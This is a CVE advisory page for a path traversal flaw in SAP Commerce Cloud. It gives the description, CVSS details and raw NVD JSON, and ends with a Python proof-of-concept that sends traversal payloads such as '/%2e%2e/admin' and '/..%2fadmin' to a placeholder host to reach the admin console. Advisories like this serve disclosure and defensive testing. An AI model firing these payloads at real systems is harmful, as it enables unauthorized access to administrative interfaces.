Security Vulnerability Report
中文
CVE-2025-42906 CVSS 5.3 MEDIUM

CVE-2025-42906

Published: 2025-10-14 01:15:32
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

SAP Commerce Cloud contains a path traversal vulnerability that may allow users to access web applications such as the Administration Console from addresses where the Administration Console is not explicitly deployed. This could potentially bypass configured access restrictions, resulting in a low impact on confidentiality, with no impact on the integrity or availability of the application.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAP Commerce Cloud 所有未安装2025年10月安全补丁的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-42906 - SAP Commerce Cloud Path Traversal PoC # Vulnerability: Path Traversal allowing access to Administration Console # from non-deployed addresses, bypassing access restrictions import requests TARGET_URL = "https://target-sap-commerce.example.com" def exploit_path_traversal(base_url): """ Attempt to access Administration Console via path traversal by manipulating URL paths to bypass routing restrictions. """ # Various path traversal payloads to test payloads = [ "/../admin", "/%2e%2e/admin", "/..%2fadmin", "/;/../admin", "/admin/../../../admin", "/../backoffice", "/%2e%2e/backoffice", "/hac/../hac", "/../hac", ] for payload in payloads: url = f"{base_url}{payload}" try: response = requests.get(url, timeout=10, verify=False, allow_redirects=False) print(f"[*] Trying: {url}") print(f" Status: {response.status_code}, Length: {len(response.text)}") # Check if response indicates admin console access if response.status_code == 200 and len(response.text) > 0: if any(keyword in response.text.lower() for keyword in ["admin", "console", "backoffice", "hac", "login"]): print(f"[+] Potential access found: {url}") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("=== CVE-2025-42906 Path Traversal PoC ===") result = exploit_path_traversal(TARGET_URL) if result: print("[+] Exploit completed - Admin console may be accessible") else: print("[-] No accessible admin console found")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-42906", "sourceIdentifier": "[email protected]", "published": "2025-10-14T01:15:32.317", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Commerce Cloud contains a path traversal vulnerability that may allow users to access web applications such as the Administration Console from addresses where the Administration Console is not explicitly deployed. This could potentially bypass configured access restrictions, resulting in a low impact on confidentiality, with no impact on the integrity or availability of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://me.sap.com/notes/3634724", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.